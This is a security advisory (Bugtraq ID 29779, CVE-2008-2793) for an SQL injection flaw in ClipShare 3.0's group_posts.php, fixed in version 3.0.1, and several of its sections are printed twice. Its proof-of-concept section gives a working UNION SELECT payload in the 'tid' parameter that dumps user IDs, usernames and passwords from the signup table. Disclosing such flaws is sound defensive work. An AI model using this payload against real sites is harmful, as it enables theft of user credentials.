ClipShare 'group_posts.php' SQL Injection Vulnerability
BID:29779
Info
ClipShare 'group_posts.php' SQL Injection Vulnerability
| Bugtraq ID: | 29779 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-2793 |
| Remote: | Yes |
| Local: | No |
| Published: | Jun 17 2008 12:00AM |
| Updated: | May 07 2015 05:28PM |
| Credit: | SuNHouSe2 |
| Vulnerable: |
Envient ClipShare 3.0 |
| Not Vulnerable: |
Envient ClipShare 3.0.1 |
Discussion
ClipShare 'group_posts.php' SQL Injection Vulnerability
ClipShare is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Versions prior to ClipShare 3.0.1 are vulnerable.
ClipShare is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Versions prior to ClipShare 3.0.1 are vulnerable.
Exploit / POC
ClipShare 'group_posts.php' SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following proof-of-concept URI is available:
http://www.example.com/group_posts.php?urlkey=1&gid=1&tid=-1+UNION+SELECT+1,2,3,4,concat_ws(0x3a3a,uid,username,pwd),6,7+from+signup+limit+0,20/*
Attackers can use a browser to exploit this issue.
The following proof-of-concept URI is available:
http://www.example.com/group_posts.php?urlkey=1&gid=1&tid=-1+UNION+SELECT+1,2,3,4,concat_ws(0x3a3a,uid,username,pwd),6,7+from+signup+limit+0,20/*
Solution / Fix
ClipShare 'group_posts.php' SQL Injection Vulnerability
Solution:
Reports indicate that this issue has been fixed in ClipShare 3.0.1. Please contact the vendor for details.
Solution:
Reports indicate that this issue has been fixed in ClipShare 3.0.1. Please contact the vendor for details.
References
ClipShare 'group_posts.php' SQL Injection Vulnerability
References:
References:
- ClipShare < 3.0.1 (tid) Remote SQL Injection Vulnerability (SuNHouSe2)
- ClipShare Homepage (Envient)